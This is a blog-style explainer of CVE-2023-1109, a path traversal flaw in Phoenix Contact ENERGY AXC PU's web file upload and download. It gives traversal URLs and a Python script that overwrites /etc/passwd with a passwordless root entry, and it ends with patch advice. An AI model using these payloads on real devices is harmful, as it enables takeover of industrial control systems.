CVE-2023-1109 - How Attackers Can Compromise Phoenix Contacts ENERGY AXC PU Using File Access Flaws

Phoenix Contact is a popular automation and control systems provider, and their ENERGY AXC PU Web service is widely used in industrial environments. In early 2023, a serious vulnerability was discovered that allows attackers to gain full control of the device simply by manipulating URLs in the web interface. Here’s a straightforward breakdown of CVE-2023-1109, how it works, and what you need to watch out for.

What Is CVE-2023-1109?

CVE-2023-1109 is a security weakness in the Phoenix Contacts ENERGY AXC PU’s web frontend. The flaw allows any authenticated user — even those with limited/restricted privileges — to perform unauthorized actions. Specifically, someone logged in can access, read, write, and create files anywhere on the file system, not just in user-designated areas.

That goes far beyond what these users should be able to do. By abusing the upload and download features, bad actors can take over the entire system, upload malicious software, or steal sensitive configurations.

Any restricted user can become an attacker

- Full file system access means attackers can overwrite important files, install backdoors, or steal sensitive information
- Remote code execution is a likely result, giving attackers control over automation hardware, which could affect entire factories or power grids

Even though the attacker needs to log in (i.e., needs a valid account), these accounts often aren’t well protected, especially if “operator” or “user” credentials are shared among staff.

How the Exploit Works (Technical Details)

The vulnerability is in the web frontend’s file upload and download endpoints. These functions typically restrict file access to specific folders, but due to improper input validation, attackers can use path traversal attacks.

Path Traversal means using inputs like ../ (dot-dot-slash) to get to directories you shouldn’t have access to. For example: ../../../../etc/passwd on Unix systems.

Let’s say the upload URL looks like this

http://device-ip/webservice/upload?name=myconfig.txt

A restricted user can change the filename parameter to something like

http://device-ip/webservice/upload?name=../../../../../etc/shadow

Now, the file you upload will overwrite the critical /etc/shadow file!

Similarly, for download

http://device-ip/webservice/download?file=../../../../../etc/passwd

You can retrieve the device’s password file (or any other file) as an unprivileged user.

Code Example: Crafting a Malicious Upload

Here is a simple Python snippet that uploads a file outside the allowed folder, overwriting a system file:

import requests

url = 'http://<DEVICE-IP>/webservice/upload';
target_file = '../../../../etc/passwd'   # Path we want to overwrite
file_contents = b'root::::root:/root:/bin/bash\n'  # Malicious replacement
cookies = {'session': '<valid-session-cookie>'}

files = {
    'file': (target_file, file_contents)
}
params = {'name': target_file}

# Send the upload request
response = requests.post(url, files=files, params=params, cookies=cookies)
print(response.text)

Replace <DEVICE-IP> with your device’s IP and <valid-session-cookie> with your actual authenticated session cookie.

Responsible Disclosure & Fixes

Phoenix Contact Security Advisory:  
Read the official vendor advisory:  
https://cert.vde.com/de-de/advisories/vde-2023-012

References

- CVE Details for CVE-2023-1109
- Vendor Advisory (VDE-2023-012)
- Phoenix Contact Product Page

Conclusion

CVE-2023-1109 is a critical vulnerability affecting important industrial devices. Even limited users can take over the system using just well-chosen URLs in upload/download features. If you’re using Phoenix Contact ENERGY AXC PU, patch immediately, restrict user access, and keep a close eye on your logs.

Timeline

Published on: 04/17/2023 08:15:00 UTC
Last modified on: 04/17/2023 13:12:00 UTC